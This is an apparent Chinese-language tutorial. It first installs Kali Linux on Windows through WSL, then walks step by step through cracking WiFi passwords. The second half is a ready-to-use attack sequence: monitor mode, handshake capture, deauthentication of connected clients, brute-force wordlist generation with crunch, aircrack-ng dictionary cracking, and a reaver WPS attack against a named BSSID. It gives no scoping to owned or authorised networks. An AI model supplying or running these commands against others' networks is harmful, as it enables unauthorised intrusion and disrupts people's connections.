Kali Linux 是基于 Debian 的 Linux 发行版,它预装了许多渗透测试软件,包括 nmap、Wireshark、Aircrack-ng…

开始之前需要准备一个 Kali Linux 系统

安装

1
2
3
4
5
Installing, this may take a few minutes...
WslRegisterDistribution failed with error: 0x80004005
Error: 0x80004005 ??????

Press any key to continue...

Windows Subsystem for Linux

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
wsl --set-default-version 2
#更新公钥
dpkg -i kali-archive-keyring_2022.1_all.deb
#替换国内源
here is tuna for tsinghua mirros
deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
#更新软件
apt-get update -y apt-get upgrade -y
#安装完整的 Kali
sudo apt install -y kali-linux-large
#更新
sudo apt update
sudo apt upgrade
#安装可视化界面
sudo apt install kali-win-kex
#启动图形界面
kex
#运行中F8按钮。可以变换为窗口模式或者退出。实质为一种远程桌面软件,运行稳定可靠
sudo dpkg-reconfigure locales
#选择找到 en_US.UTF-8 / zh_CN.GBK / zh_CN.UTF-8 空格选中,按回车进入下一步
#在 cmd 终端中关闭 linux 命令(linux 系统启动后,关闭需要在终端进行)
wsl --shutdown
#设置 WSL 默认为 Kali-Linux
wsl --set-version kali-linux 2
#设置默认登录用户为 root
here is kali.exe FilePath:C:\Program Files\WindowsApps\KaliLinux.....
we can use Everything search for:kali.exe to find it.
kali.exe config --default-user root
#报错参考
apt -y install libcrypt1
apt -y —fix-broken install
cd /tmp 
apt -y download libcrypt1 
dpkg-deb -x libcrypt1_1%3a4.4.27-1.1_amd64.deb . 
cp -av lib/x86_64-linux-gnu/* /lib/x86_64-linux-gnu/
apt -y --fix-broken instal

扫描

本文是用 Ventoy 直接从 U 盘启动 Live 镜像,默认账户密码为:kali/kali,进入系统以后打开终端进行如下操作:

开启设备监听

1
sudo airmon-ng start wlan0

扫描附近 WiFi

1
sudo airodump-ng wlan0mon

抓包指定 WiFi

1
sudo airodump-ng --bssid <BSSID> --channel <频道> --write <包名> wlan0mon

断开客户端

1
sudo aireplay-ng --deauth 10 -a <BSSID> -c <客户端 MAC> wlan0mon

生成密码字典

1
2
3
4
#生成 8 位密码,包含大小写、数字,生成的文件很大
sudo crunch 8 8 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 -o password.txt
#生成 8 位密码
sudo crunch 8 8 -t @@,,%%^^ -o password.txt

密码猜解

1
2
3
sudo aircrack-ng -w <密码字典文件> -b <BSSID> <包名-xx.cap>
#自带字典目录:/usr/share/wordlists/
#如:/usr/share/wordlists/wifite.txt
1
sudo reaver -i wlan0mon -b 00:5C:C2:22:27:CF -vv